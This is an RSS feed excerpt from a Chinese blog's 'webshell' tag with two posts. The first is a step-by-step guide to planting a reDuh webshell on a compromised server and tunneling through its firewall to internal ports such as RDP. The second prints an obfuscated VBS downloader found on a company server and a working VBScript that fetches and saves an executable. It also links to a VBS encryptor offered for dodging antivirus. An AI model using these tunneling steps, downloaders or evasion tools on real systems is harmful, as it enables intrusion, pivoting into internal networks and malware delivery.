<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>奋斗博客 &#187; webshell</title>
	<atom:link href="http://www.fendou.info/tag/webshell/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.fendou.info</link>
	<description>WordPress&#124;SEO&#124;Web&#124;Linux&#124;Windows&#124;Android</description>
	<lastBuildDate>Wed, 16 May 2012 07:29:10 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>webshell跳板reDuh使用说明</title>
		<link>http://www.fendou.info/webshell-proxy-reduh/</link>
		<comments>http://www.fendou.info/webshell-proxy-reduh/#comments</comments>
		<pubDate>Fri, 18 Feb 2011 10:16:12 +0000</pubDate>
		<dc:creator>dev</dc:creator>
				<category><![CDATA[网络技术]]></category>
		<category><![CDATA[Http]]></category>
		<category><![CDATA[lcx]]></category>
		<category><![CDATA[reDuh]]></category>
		<category><![CDATA[sensepost]]></category>
		<category><![CDATA[webshell]]></category>
		<category><![CDATA[内网渗透]]></category>
		<category><![CDATA[端口映射]]></category>
		<category><![CDATA[隧道转发]]></category>

		<guid isPermaLink="false">http://www.fendou.info/?p=1448</guid>
		<description><![CDATA[reDuh是可以把内网服务器的端口通过http或https隧道转发到本机，形成一个TCP连通回路，用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部端口的工具。

reDuh和LCX的功能类似，都可以将内网端口映射到本机，reDuh和LCX不同的地方就是reDuh不需要本地电脑拥有外网IP，在某些本地内网做了端口策略的环境中LCX就无用武之地了。

reDuh是sensepost网站发布的，reDuh与LCX不同，它包含两个部分，Java版本的本地客户端和webshell服务端，其中服务端针对不同的服务器又分为aspx,php,jsp三个版本。 <a href="http://www.fendou.info/webshell-proxy-reduh/">继续阅读 <span class="meta-nav">&#8594;</span></a><table class="wumii-related-items" cellspacing="0" cellpadding="3" border="0"  style="clear: both;">
    
    <tr>
        <td colspan="5"><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;"></font></b></td>
    </tr>
    
        <tr>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important;">
                    <a target="_blank" title="内网端口映射工具lcx使用方法" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Flcx-usage%2F&from=http%3A%2F%2Fwww.fendou.info%2Fwebshell-proxy-reduh%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293905.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">内网端口映射工具lcx使用方法</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="VBS代码加密解密" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F&from=http%3A%2F%2Fwww.fendou.info%2Fwebshell-proxy-reduh%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293540.png" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">VBS代码加密解密</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="开心网 cookies 欺骗 " style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fkaixin001-cookies-arp%2F&from=http%3A%2F%2Fwww.fendou.info%2Fwebshell-proxy-reduh%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/20/11154184.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">开心网 cookies 欺骗 </font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="Google搜索又添新功能：谷歌搜索百宝箱" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fgoogle-search-new-tools%2F&from=http%3A%2F%2Fwww.fendou.info%2Fwebshell-proxy-reduh%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/12/09/12105701.gif" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">Google搜索又添新功能：谷歌搜索百宝箱</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="ASP.NET 4‎.0 生成 eurl.axd Http异常错误的处理方法" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fasp-net-4-0-applications-might-generate-httpexception-errors-that-reference-eurl-axd%2F&from=http%3A%2F%2Fwww.fendou.info%2Fwebshell-proxy-reduh%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/06/10357500.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">ASP.NET 4‎.0 生成 eurl.axd Http异常错误的处理方法</font>
                    </a>
                </td>
        </tr>
    
    <tr>
        <td colspan="5" align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems" target="_blank" title="无觅相关文章插件">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table>]]></description>
			<content:encoded><![CDATA[<p>reDuh是可以把内网服务器的端口通过http或https隧道转发到本机，形成一个TCP连通回路，用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部端口的工具。</p>
<p>reDuh和<a title="lcx功能" href="http://www.fendou.info/network/lcx-usage.html" target="_blank">LCX的功能</a>类似，都可以将内网端口映射到本机，reDuh和LCX不同的地方就是reDuh不需要本地电脑拥有外网IP，在某些本地内网做了端口策略的环境中LCX就无用武之地了。</p>
<p>reDuh是<a href="http://www.sensepost.com/labs/tools/pentest/reduh">sensepost</a>网站发布的，reDuh与LCX不同，它包含两个部分，Java版本的本地客户端和webshell服务端，其中服务端针对不同的服务器又分为aspx,php,jsp三个版本。</p>
<p>reDuh的使用方法很简单，首先描述一下使用环境<span id="more-1448"></span></p>
<p>1.拥有目标服务器网站的通用webshell，用于上传reDuh服务端</p>
<p>2.知道目标服务器开放的内网端口，如远程桌面的端口是3389</p>
<p>3.目标服务器网络做了端口策略，只允许外部访问内网的80端口</p>
<p><a href="http://www.fendou.info/wp-content/uploads/2011/02/net.png" rel="lightbox[1448]"><img class="alignnone size-full wp-image-1450" title="reDuh使用环境" src="http://www.fendou.info/wp-content/uploads/2011/02/net.png" alt="" width="540" height="301" /></a></p>
<p>如上图所示，防火墙后面的任意一台都可以成为我们的目标服务器，我们假设那台Windows服务器开放了Web服务，并且取得了Webshell权限。按照以下步骤操作就可以通过reDuh建立的TCP连通回路从外网连接到防火墙内目标服务器的任意端口。</p>
<p>1.把服务端的webshell上传到目标服务器。</p>
<p><a href="http://www.fendou.info/wp-content/uploads/2011/02/1.jpg" rel="lightbox[1448]"><img class="alignnone size-full wp-image-1451" title="1" src="http://www.fendou.info/wp-content/uploads/2011/02/1.jpg" alt="" width="386" height="206" /></a></p>
<p>2.确认目标服务器开放的端口，这里以远程桌面为例。</p>
<p><a href="http://www.fendou.info/wp-content/uploads/2011/02/2.jpg" rel="lightbox[1448]"><img class="alignnone size-full wp-image-1452" title="2" src="http://www.fendou.info/wp-content/uploads/2011/02/2.jpg" alt="" width="696" height="576" /></a></p>
<p>3.在本地命令行下用客户端连接服务端 <span style="color: #ff0000;">E:\test&gt;java reDuhClient 目标服务器域名 http 80 /WEBSHELL路径/reDuh.aspx</span></p>
<p><a href="http://www.fendou.info/wp-content/uploads/2011/02/3.jpg" rel="lightbox[1448]"><img class="alignnone size-full wp-image-1453" title="3" src="http://www.fendou.info/wp-content/uploads/2011/02/3.jpg" alt="" width="660" height="149" /></a></p>
<p>4.在本地用NC连接1010端口 <span style="color: #ff0000;">H:\&gt;nc -vv localhost 1010 <span style="color: #000000;">提示”Welcome to the reDuh command line” 表示连接成功</span><br />
</span></p>
<p><a href="http://www.fendou.info/wp-content/uploads/2011/02/4.jpg" rel="lightbox[1448]"><img class="alignnone size-full wp-image-1454" title="4" src="http://www.fendou.info/wp-content/uploads/2011/02/4.jpg" alt="" width="666" height="128" /></a></p>
<p>5.输入reDuh命令 <span style="color: #ff0000;">&gt;&gt;[createTunnel]1234:127.0.0.1:3389 </span></p>
<p>前面的1234是本机连接用的端口，中间的ip地址是目标服务器的（可以是webshell所在服务器也可以是和它同内网的服务器），后面的3389是欲连接目标服务器的端口。</p>
<p>成功后两个命令行窗口都会有成功提示。</p>
<p><a href="http://www.fendou.info/wp-content/uploads/2011/02/5.jpg" rel="lightbox[1448]"><img class="alignnone size-full wp-image-1455" title="5" src="http://www.fendou.info/wp-content/uploads/2011/02/5.jpg" alt="" width="668" height="162" /></a></p>
<p><a href="http://www.fendou.info/wp-content/uploads/2011/02/6.jpg" rel="lightbox[1448]"><img class="alignnone size-full wp-image-1456" title="6" src="http://www.fendou.info/wp-content/uploads/2011/02/6.jpg" alt="" width="668" height="181" /></a></p>
<p>6.这时通道已经建立，你连接本机的1234端口 <span style="color: #ff0000;">mstsc 127.0.0.1:1234</span> 就相当于连接到目标服务器的3389端口了。</p>
<p><a href="http://www.fendou.info/wp-content/uploads/2011/02/7.jpg" rel="lightbox[1448]"><img class="alignnone size-full wp-image-1457" title="7" src="http://www.fendou.info/wp-content/uploads/2011/02/7.jpg" alt="" width="407" height="231" /></a></p>
<p><a href="http://www.fendou.info/wp-content/uploads/2011/02/8.jpg" rel="lightbox[1448]"><img class="alignnone size-full wp-image-1458" title="8" src="http://www.fendou.info/wp-content/uploads/2011/02/8.jpg" alt="" width="985" height="480" /></a></p>
<p>7.命令行会显示数据传输</p>
<p><a href="http://www.fendou.info/wp-content/uploads/2011/02/9.jpg" rel="lightbox[1448]"><img class="alignnone size-full wp-image-1459" title="9" src="http://www.fendou.info/wp-content/uploads/2011/02/9.jpg" alt="" width="666" height="179" /></a></p>
<p><a title="reduhclient" href="http://www.fendou.info/x/reduh/reduhclient-0.3.zip" target="_blank">reDuh客户端下载</a> <a title="reduhclient-0.3.zip  大小:29.25 K, 下载次数:333" href="http://www.sai52.com/attachment.php?id=1928" target="_blank">reduhclient-0.3.zip</a><br />
<a title="reduh-server" href="http://www.fendou.info/x/reduh/reduh-server-all.gz" target="_blank">reDuh服务端下载</a> <a title="reduh-server-all.gz  大小:13.83 K, 下载次数:306" href="http://www.sai52.com/attachment.php?id=1929" target="_blank">reduh-server-all.gz</a></p>
<table class="wumii-related-items" cellspacing="0" cellpadding="3" border="0"  style="clear: both;">
    
    <tr>
        <td colspan="5"><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;"></font></b></td>
    </tr>
    
        <tr>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important;">
                    <a target="_blank" title="内网端口映射工具lcx使用方法" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Flcx-usage%2F&from=http%3A%2F%2Fwww.fendou.info%2Fwebshell-proxy-reduh%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293905.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">内网端口映射工具lcx使用方法</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="VBS代码加密解密" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F&from=http%3A%2F%2Fwww.fendou.info%2Fwebshell-proxy-reduh%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293540.png" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">VBS代码加密解密</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="开心网 cookies 欺骗 " style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fkaixin001-cookies-arp%2F&from=http%3A%2F%2Fwww.fendou.info%2Fwebshell-proxy-reduh%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/20/11154184.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">开心网 cookies 欺骗 </font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="Google搜索又添新功能：谷歌搜索百宝箱" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fgoogle-search-new-tools%2F&from=http%3A%2F%2Fwww.fendou.info%2Fwebshell-proxy-reduh%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/12/09/12105701.gif" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">Google搜索又添新功能：谷歌搜索百宝箱</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="ASP.NET 4‎.0 生成 eurl.axd Http异常错误的处理方法" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fasp-net-4-0-applications-might-generate-httpexception-errors-that-reference-eurl-axd%2F&from=http%3A%2F%2Fwww.fendou.info%2Fwebshell-proxy-reduh%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/06/10357500.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">ASP.NET 4‎.0 生成 eurl.axd Http异常错误的处理方法</font>
                    </a>
                </td>
        </tr>
    
    <tr>
        <td colspan="5" align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems" target="_blank" title="无觅相关文章插件">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table>]]></content:encoded>
			<wfw:commentRss>http://www.fendou.info/webshell-proxy-reduh/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>VBS代码加密解密</title>
		<link>http://www.fendou.info/vbs-code-encode-and-unencode/</link>
		<comments>http://www.fendou.info/vbs-code-encode-and-unencode/#comments</comments>
		<pubDate>Thu, 28 Jan 2010 11:00:15 +0000</pubDate>
		<dc:creator>dev</dc:creator>
				<category><![CDATA[操作系统]]></category>
		<category><![CDATA[VBS]]></category>
		<category><![CDATA[VBScript]]></category>
		<category><![CDATA[webshell]]></category>
		<category><![CDATA[加密]]></category>
		<category><![CDATA[工具下载]]></category>
		<category><![CDATA[解密]]></category>

		<guid isPermaLink="false">http://www.fendou.info/?p=848</guid>
		<description><![CDATA[今天无意中在公司服务器系统盘根目录下发现了一个可疑的vbs脚本。打开看看发现vbs代码是加密的，这更加证明这个脚本的可疑。

我对vbs代码只能算是了解，能看懂，但是编却编不出来。为了解密这个vbs代码，用搜索引擎搜索了半天，找到好多相关的资料，发现原来vbs如此强大。以这篇文章收集vbs代码供以后学习。 <a href="http://www.fendou.info/vbs-code-encode-and-unencode/">继续阅读 <span class="meta-nav">&#8594;</span></a><table class="wumii-related-items" cellspacing="0" cellpadding="3" border="0"  style="clear: both;">
    
    <tr>
        <td colspan="5"><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;"></font></b></td>
    </tr>
    
        <tr>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important;">
                    <a target="_blank" title="VBS代码收集" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-collect%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/20/11181867.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">VBS代码收集</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="vbs脚本实现普通用户以管理员权限运行程序" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-run-software-as-administrator%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293898.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">vbs脚本实现普通用户以管理员权限运行程序</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="VBS脚本得到CPU使用率，硬盘使用率和内存使用率" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-get-cpu-harddisk-ram-rate%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/12/09/12114386.gif" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">VBS脚本得到CPU使用率，硬盘使用率和内存使用率</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="解密被加密的wordpress主题" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fto-decrypt-encrypted-wordpress-themes%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/23/11350651.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">解密被加密的wordpress主题</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="webshell跳板reDuh使用说明" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fwebshell-proxy-reduh%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9292452.png" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">webshell跳板reDuh使用说明</font>
                    </a>
                </td>
        </tr>
    
    <tr>
        <td colspan="5" align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems" target="_blank" title="无觅相关文章插件">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table>]]></description>
			<content:encoded><![CDATA[<p>今天无意中在公司服务器系统盘根目录下发现了一个可疑的vbs脚本。打开看看发现vbs代码是加密的，这更加证明这个脚本的可疑。</p>
<p>我对vbs代码只能算是了解，能看懂，但是编却编不出来。为了解密这个vbs代码，用搜索引擎搜索了半天，找到好多相关的资料，发现原来vbs如此强大。以这篇文章收集vbs代码供以后学习。</p>
<p>简单介绍一下什么是vbs。VBScript是Visual Basic Script的简称，有时也被缩写为VBS。VBScript是微软开发的一种脚本语言，可以看作是VB语言的简化版，与VBA的关系也非常密切。</p>
<p>它具有原语言容易学习的特性。目前这种语言广泛应用于网页和ASP程序制作，同时还可以直接作为一个可执行程序。用于调试简单的VB语句非常方便。<span id="more-848"></span></p>
<p>下面是我发现的可疑代码</p>

<div class="wp_syntax"><div class="code"><pre class="vbscript" style="font-family:monospace;">Str=Array(97,108,61,76,67,97,115,101,40,87,83,99,114,105,112,116,46,65,114,103,117,109,101,110,116,115,40,49,41,41,13,10,116,101,61,76,67,97,115,101,40,87,83,99,114,105,112,116,46,65,114,103,117,109,101,110,116,115,40,48,41,41,13,10,83,101,116,32,120,80,111,115,116,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,41,13,10,120,80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,116,101,44,48,13,10,120,80,111,115,116,46,83,101,110,100,40,41,13,10,83,101,116,32,101,116,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,13,10,101,116,46,77,111,100,101,61,51,13,10,101,116,46,84,121,112,101,61,49,13,10,101,116,46,79,112,101,110,40,41,13,10,101,116,46,87,114,105,116,101,40,120,80,111,115,116,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,101,116,46,83,97,118,101,84,111,70,105,108,101,32,97,108,44,50)
Function Num2Str(Str):For I=0 To UBound(Str):Num2Str=Num2Str &amp; Chr(Str(I)):Next:End Function
Execute Num2Str(Str)</pre></div></div>

<p>看到这段代码让我想起前几天<a href="http://www.fendou.info/wordpress/to-decrypt-encrypted-wordpress-themes.html">解密了一个wordpress主题文件</a>。从加密的结构上看差不多，前面是加密的字符串，后面跟着加密的算法，虽然语言不同，但是可以用类似的方法去解决。在网上搜索相关的vbs语法后直接用 msgbox替换掉 Execute并运行，未加密的vbs代码直接弹了出来</p>
<p><a href="http://www.fendou.info/wp-content/uploads/2010/01/vbs.png" rel="lightbox[848]"><img src="http://www.fendou.info/wp-content/uploads/2010/01/vbs.png" alt="" title="vbs" width="418" height="290" class="aligncenter size-full wp-image-852" /></a></p>
<p>解密出来的代码原来是webshell提权用的vbs脚本，作用就是可以下载任意文件到网站的服务器上。加密是为了躲过杀毒软件的查杀。</p>
<p>说到webshell执行vbs脚本下载文件，其实有好多方法，举个例子(可能被有些杀毒软件当成病毒)：</p>

<div class="wp_syntax"><div class="code"><pre class="vbscript" style="font-family:monospace;">url = &quot;http://127.0.0.1/test.exe&quot; '网络上的文件地址或者程序  
saveas = &quot;x.exe&quot; '保存成的本地文件或者名字（自定义）  
Set xmlhttp = CreateObject(&quot;Microsoft.XMLHTTP&quot;) '创建HTTP请求对象  
Set stream = CreateObject(&quot;ADODB.Stream&quot;) '创建ADO数据流对象  
&nbsp;
Call xmlhttp.open(&quot;GET&quot;,url,False)'打开连接  
Call xmlhttp.send()'发送请求  
&nbsp;
stream.mode = 3 '设置数据流为读写模式  
stream.type = 1 '设置数据流为二进制模式  
Call stream.open()'打开数据流  
Call stream.write(xmlhttp.responsebody)'将服务器的返回报文主体内容写入数据流  
Call stream.savetofile(saveas,2)'将数据流保存为文件  
&nbsp;
'释放对象  
Set xmlhttp = Nothing  
Set stream = Nothing  
dim a '定义a变量  
set a=CreateObject(&quot;Wscript.Shell&quot;) '暂时屏蔽 创建应用脚本程序</pre></div></div>

<p>上面那个可疑脚本的加密方式可以很好的躲过杀毒软件，在网上找到个类似的vbs脚本加密软件，加密出来的效果跟那个加密代码差不多。<a href="http://www.fendou.info/x/vbs/vbs-encode.rar">vbs脚本加密器下载</a>   <a href="http://www.fendou.info/x/vbs/vbs-compile.rar">vbs脚本编辑器(vbs转换成exe)下载</a></p>
<p><strong>VBS代码收集</strong></p>
<p>唉！代码太多了，另起一篇吧！</p>
<table class="wumii-related-items" cellspacing="0" cellpadding="3" border="0"  style="clear: both;">
    
    <tr>
        <td colspan="5"><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;"></font></b></td>
    </tr>
    
        <tr>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important;">
                    <a target="_blank" title="VBS代码收集" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-collect%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/20/11181867.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">VBS代码收集</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="vbs脚本实现普通用户以管理员权限运行程序" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-run-software-as-administrator%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293898.jpg" width="105px" height="105px" /><br />
